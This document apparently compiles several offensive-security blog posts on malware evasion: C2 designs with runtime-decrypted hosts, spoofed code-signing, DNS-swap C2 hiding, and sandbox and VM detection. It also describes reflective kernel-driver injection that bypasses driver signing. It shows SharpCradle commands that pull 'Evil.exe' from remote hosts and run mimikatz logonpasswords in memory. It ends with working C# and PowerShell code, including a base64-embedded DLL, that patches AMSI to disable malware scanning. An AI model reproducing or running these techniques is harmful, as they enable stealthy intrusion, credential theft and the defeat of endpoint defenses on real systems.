If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW winAPI. We can do what we did above for Creating Processes as well. But instead of hardcoding the Encrypted array for the Process to be executed, we will send the process name as an array over network once the executable connects to the C2 Server along with the host. We can also use authentication on C2 server, and only allow it to connect if it sends a proper key. Below is the Code for Creating Processes using Encrypted Char array over sockets

In this way, when a system sandboxes our executable, it won’t know that what process are we executing beforehand inside a sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a Script in python which can fetch and create duplicate certificates from any website which we can use for code signing. One thing I noticed is that Antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason being not every antivirus can connect to internet in every organization to fetch and verify the ceritificates for every third party application installed. You can find the Certificate spoofing python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next thing is we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade Sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious. Because if it does, then the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection because this is where most SOC detects the malware and the Red Teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found out till date which almost works every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that it points to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the vicim’s system, it will connect to this domain which will send a normal HTTP reply from Microsoft and the malware will go to sleep for a few hours and then loop into doing the same thing. Now whenever I want to get a reverse shell of my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key in HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of malicious or phishing site. And even the Endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shutdown. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run it. Make sure to use NTP to check the time with external domain, else Sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that correct time is checked. Below is the code to check uptime of a system and also idle time in case required.

Idletime:

Uptime:

Check Mac Address of Virtual Machine (Known OUIs)

Vmware, Virtual box, MS Hyper-v and a lot of virtual machine providers use a fixed MAC Unique identifier which can be used to run in a loop to check if current mac address matches to any of those mentioned in the list. If it is, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know for the moment. If there are more, do let me know in the comments.

Company and Products MAC unique identifier (s)
VMware ESX 3, Server, Workstation, Player 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo 00-1C-42
Virtual Iron 4 00-0F-4B
Red Hat Xen 00-16-3E
Oracle VM 00-16-3E
XenSource 00-16-3E
Novell Xen 00-16-3E
Sun xVM VirtualBox 08-00-27

Below is the C code to detect mac address of a Windows machine:

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we are only executing our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism. Every time a different shellcode depending on the key will confuse the Antivirus, and secondly in a sandbox, no one presses any key. So, our malware won’t execute in a sandbox. Below is the Code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging 😉

Check number of files in Temp and Recent Files

Whenever a malware is running in a sandbox, the sandbox will have the minimum number of recent files in the virtual machine reason being sandboxes are not used for usual work. So, we can run a loop to check the number of recent files and also files in temp directory to check if we are running in a virtual machine. If the number of recent files are less than 10-15, just sleep or suspend itself. Below is a code I wrote which loops to check all files and folders in a directory:

Now I can keep on going like this, but the blog will just get lengthier with this. Besides, below are a few things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method which WannaCry used. So basically, the malware will try to connect to a domain that doesn’t exist. If it does, it means the malware is running in a sandbox, since Sandboxes will reply to a NX Domain too to check if that’s a C2 Server. If we get a NX domain in reply, then we can directly connect to the C2 host. BEWARE, that DNS Sinkholes can prevent your malware from executing at all. Instead you can buy a certain domain and check for a customized response to check if you are running in a sandbox environment.

Now, there are much more different ways to evade ML and AV detection and they aren’t really that hard. Evading ML based AVs are not rocket science as people say. It’s just that it requires more of free time to sit and understand how the underlying architecture works and find flaws to evade it.

It’s much better to invest in a highly technical Threat Hunter for detecting suspicious behaviors in your environment’s and logs rather than buying a high-end Sandbox or Antivirus Solution, though the latter is also useful in it’s own sense too.

 

Library to reflectively load a driver and bypass Windows Driver signing enforcement .

Картинки по запросу kernel driver signing

About

Reflective Kernel Driver injection is a injection technique base off Reflective DLL injection by Stephen Fewer. The technique bypasses Windows driver signing enforcement (KMCS). Reflective programming is employed to perform the loading of a driver from memory into the kernel. As such the driver is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. Injection works on Windows Vista up to Windows 10, running on x64.

An exploit for the Capcom driver is also included as a simple usage example.

Overview

The process of injecting a driver into the kernel is twofold. Firstly, the driver you wish to inject must be written into the kernel address space. Secondly the driver must be loaded into kernel in such a way that the driver’s run time expectations are met, such as resolving its imports or relocating it to a suitable location in memory.

Assuming we have ring0 code execution and the driver we wish to inject has been written into an arbitrary location of memory kernel, Reflective Driver Injection works as follows.

  • Execution is passed, either via PSCreateSystemThread() or a tiny bootstrap shellcode, to the driver’s ReflectiveLoader function which is located at the beginning of the driver’s code section (typically offset 0x400).
  • As the driver’s image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image’s current location in memory so as to be able to parse its own headers for use later on.
  • The ReflectiveLoader will then use MmGetSystemRoutineAddress (assumed to be passed in as arg0) to calculate the addresses of six functions required by the loader, namely ExAllocatePoolWithTag, ExFreePoolWithTag, IoCreateDriver, RtlImageDirectoryEntryToData, RtlImageNtHeader, and RtlQueryModuleInformation.
  • The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.
  • The driver’s headers and sections are loaded into their new locations in memory.
  • The ReflectiveLoader will then process the newly loaded copy of its image’s relocation table.
  • The ReflectiveLoader will then process the newly loaded copy of its image’s import table, resolving any module dependencies (assuming they are already loaded into the kernel) and their respective imported function addresses.
  • The ReflectiveLoader will then call IoCreateDriver passing the driver’s DriverEntry exported function as the second parameter. The driver has now been successfully loaded into memory.
  • Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via PSCreateSystemThread, the thread will terminate.

Build

Open the ‘Reflective Driver Loading.sln’ file in Visual Studio C++ and build the solution in Release mode to make Hadouken.exe and reflective_driver.sys

Usage

To test load Capcom.sys into the kernel then use the Hadouken.exe to inject reflective_driver.sys into the kernel e.g.:

Hadouken reflective_driver.sys

DOWNLOAD

SharpCradle — Loading remote C# binaries and executing them in memory

Картинки по запросу C# .net( Original text by  )

I am not a security researcher, expert, or guru.  If I misrepresent anything in this article, I assure you it was on accident and I will gladly make any updates if needed.  This is intended for educational purposes only.

Background:

Over the last 4-5 years I have dabbled with using C# for offensive purposes, starting first with running Powershell via C# runspaces and then slowly digging into other ways you could use the language offensively.  This eventually led to an idea a few years ago of attempting to write a post exploitation framework all in C#.  Unfortunately, no one told me that trying to write a full functioning post exploitation framework by yourself was not only extremely time consuming but also extremely hard.  So I decided it would be much easier to release small tools that have the functionality of some of the modules I had been working on, the first release being SharpCradle.

What it does:

SharpCradle loads a remote C# PE binary from either a remote file or web server using the file / web stream classes (respectively) into a byte[] array in memory.  This array is then executed using the assembly class.

How this could be useful:

SharpCradle isn’t exactly the same as our traditional powershell download cradle ( IEX (New-Object Net.Webclient).downloadstring(«http://IP/evil.ps1») ) but the concept, at least to me, is the same.  We are simply reaching out from our victim’s machine to somewhere remotely and retrieving our evil code and executing it in memory.  This helps in bypassing endpoint protections by making it harder to detect what exactly we are up to.  In fact, I have used this on a wide variety of client engagements and it has yet to get flagged, though I am sure that will eventually change as defenses are getting better every day.

Caveat:

This does not work for ALL binaries but only those written using managed code, such as C# or Visual Basic .NET.

Short example:

Since my good friend @g0ldengunsec and I just released SharpSploitConsole v1.1, which takes advantage of the awesome tool SharpSploit written by @cobbr_io, I will be using it as my «evil.exe» program that we will pull into memory using SharpCradle.

By running SharpCradle.exe without any arguments, you will see the below:

xamples

Web Server Download:

SharpCradle.exe -w https://IP/Evil.exe <arguments to pass>

SharpCradle.exe -w https://IP/SharpSploitConsole_x64.exe logonpasswords

File Server Download Anonymous:

SharpCradle.exe -f \\IP\share\Evil.exe <arguments to pass>

SharpCradle.exe -f \\IP\share\SharpSploitConsole_x64.exe logonpasswords

File Server Download With Creds:

SharpCradle.exe -f -c domain username password \\IP\share\Evil.exe <arguements to pass>

SharpCradle.exe -f -c domain username password \\IP\share\SharpSploitConsole_x64.exe logonpasswords

Download .NET inline project file from web:

SharpCradle.exe -p https://192.168.1.10/EvilProject.csproj

By simply running SharpCradle.exe with the -w flag and giving it the web address of SharpSploitConsole_x64.exe with arguments, you will see that we are able to execute SharpSploitConsole in memory without the SharpSploitConsole binary ever touching disk.

An example of downloading the binary into memory and executing the function logonpasswords from mimikatz would look like the below:

Since SharpCradle also has the ability to retrieve binaries from a file share, we could,  for example, use Impacket’s smbserver.py to spin up a quick anonymous file share on our attack system and call our evil.exe from there.  We could also go as far as to combine this with post exploitation frameworks. Cobalt Strike’s execute-assembly function currently has a 1MB limit.  SharpCradle could be used as away around this by using Cobalt Strike to execute SharpCradle to pull in larger binaries that are over 1MB in size.

Lastly, I have left a few links to where you can grab the tool as well as stand alone .cs files for both web stream or file stream in case you want to customize your own.

Link to tools:

SharpCradle GitHub — https://github.com/anthemtotheego/SharpCradle

SharpCradle Compiled Binaries — https://github.com/anthemtotheego/SharpCradle/tree/master/CompiledBinaries

SharpCradleWeb.cs —  https://github.com/anthemtotheego/Public/tree/master/Offensive_CSharp/SharpCradleWeb

SharpCradleFileShare.cs — https://github.com/anthemtotheego/Public/tree/master/Offensive_CSharp/SharpCradleShare

SharpSploitConsole — https://github.com/anthemtotheego/SharpSploitConsole

SharpSploit — https://github.com/cobbr/SharpSploit

How to bypass AMSI and execute ANY malicious Powershell code

Картинки по запросу amsi microsoft

( original text by 

Hello again. In my previous posts I detailed how to manually get SYSTEM shell from Local Administrators users. That’s interesting but very late game during a penetration assessment as it is presumed that you already owned the target machine.

This post will be more useful for early game, as AMSI (Anti Malware Scan Interface) can be a trouble to get a shell, or to execute post-exploitation tools while you still do not have an admin shell.

What is AMSI?

AMSI stands for “ANTI MALWARE SCAN INTERFACE”;

As it’s name suggests, it’s job is to scan, detect and block anything that does bad stuff.

Still doesn’t know what this is? Check this screenshot:

Screenshot

Obviously if you are experienced with penetration testing in Windows environments, you had such error with almost all public known scripts that are used like some in Nishang, Empire, PowerSploit and other awesome PowerShell scripts.

How does AMSI works?

AMSI uses “string-based” detection measures to determine if a PowerShell code is malicious or not.

Check this example:

Screenshot

Yes, the word “amsiutils” is banned. If have this word in your name, my friend, you are a malicious person for AMSI.

How to bypass string detection?

Everyone knows that string detection is very easy to bypass, just don’t use your banned string literally. Use encoding or split it in chunks and reassemble to get around this.

Here are three ways of executing the “banned” code and not get blocked:

Screenshot

Simply by splitting the word in half is enough to fool this detection scheme. We see this a lot in obfuscation. But in most of the cases, this method can fail.

Screenshot

In some cases, simply by decoding a Base64 banned code is enough to get around it.

Screenshot

And of course, you could use XOR to trick amsi and decode your string back to memory during runtime. This would be the more effective one, as it would need a higher abstraction to detect it.

All this techniques are to “GET AROUND” string detection, but we don’t want that. We want to execute the scripts in original state, the state where they are blocked by AMSI.

AMSI bypass by memory patching

This is the true bypass. Actually we do not “bypass” in the strict meaning of the word, we actually DISABLE it.

AMSI has several functions that are executed before any PowerShell code is run (from Powershell v3.0 onwards), so to bypass AMSI completely and execute any PowerShell malware, we need to memory patch them to COMPLETELY DISABLE it.

The best technique I have found in the internet is in this Link and it works in most recent version of Windows!

I wont enter in details about memory patching, you can get these details in above link

Instead, we will weaponize this technique and apply it to a PowerShell script, so we can use it in our real life engagements!

We will compile a C# DLL with code that will apply the above mentioned technique and then we will load and execute this code in a PowerShell session, disabling AMSI completely!

using System;
using System.Runtime.InteropServices;

namespace Bypass
{
    public class AMSI
    {
        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string name);
        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
        static extern void MoveMemory(IntPtr dest, IntPtr src, int size);


        public static int Disable()
        {
            IntPtr TargetDLL = LoadLibrary("amsi.dll");
            if (TargetDLL == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve amsi.dll pointer.");
                return 1;
            }

            IntPtr AmsiScanBufferPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer");
            if (AmsiScanBufferPtr == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve AmsiScanBuffer function pointer");
                return 1;
            }

            UIntPtr dwSize = (UIntPtr)5;
            uint Zero = 0;
            if (!VirtualProtect(AmsiScanBufferPtr, dwSize, 0x40, out Zero))
            {
                Console.WriteLine("ERROR: Could not change AmsiScanBuffer memory permissions!");
                return 1;
            }

            /*
             * This is a new technique, and is still working.
             * Source: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
             */
            Byte[] Patch = { 0x31, 0xff, 0x90 };
            IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
            Marshal.Copy(Patch, 0, unmanagedPointer, 3);
            MoveMemory(AmsiScanBufferPtr + 0x001b, unmanagedPointer, 3);

            Console.WriteLine("AmsiScanBuffer patch has been applied.");
            return 0;
        }
    }
}

Now, with possession of a DLL of the above code, use it like this:

Screenshot

See that we are able to use the banned word freely. From this point onwards, THERE IS NO AMSI. We are free to load ANY powershell script, malicious or not. By combining this type of attack with your malicious tools you will 100% success against AMSI.

Weaponinzing with PowerShell

Of course, in a Penetration Test we must have tools to apply such techniques automatically. Again, as we used .NET framework through C#, we can create a Posh script that reflects our DLL in-memory during runtime, without the need to touch the disk with our DLL.

Here is my PowerShell script to disable AMSI:

function Bypass-AMSI
{
    if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
        [Reflection.Assembly]::Load([Convert]::FromBase64String("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N0RBQ0VEAEJ5cGFzc0FNU0kAbXNjb3JsaWIAc3JjAERpc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAENvbnNvbGUAaE1vZHVsZQBwcm9jTmFtZQBuYW1lAFdyaXRlTGluZQBWYWx1ZVR5cGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBkd1NpemUAc2l6ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEFsbG9jSEdsb2JhbABNYXJzaGFsAEtlcm5lbDMyLmRsbABCeXBhc3NBTVNJLmRsbABTeXN0ZW0AU3lzdGVtLlJlZmxlY3Rpb24Ab3BfQWRkaXRpb24AWmVybwAuY3RvcgBVSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBSdW50aW1lSGVscGVycwBCeXBhc3MAR2V0UHJvY0FkZHJlc3MAbHBBZGRyZXNzAE9iamVjdABscGZsT2xkUHJvdGVjdABWaXJ0dWFsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAZGVzdABJbml0aWFsaXplQXJyYXkAQ29weQBMb2FkTGlicmFyeQBSdGxNb3ZlTWVtb3J5AG9w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")) | Out-Null
        Write-Output "DLL has been reflected";
    }
    [Bypass.AMSI]::Disable()
}

This will bypass string detection because it does not uses anything malicious at all. It just loads an .NET assembly to memory and execute it’s code. And after executing it, you are FREE to execute real PowerShell malware!

Check my results:

Screenshot

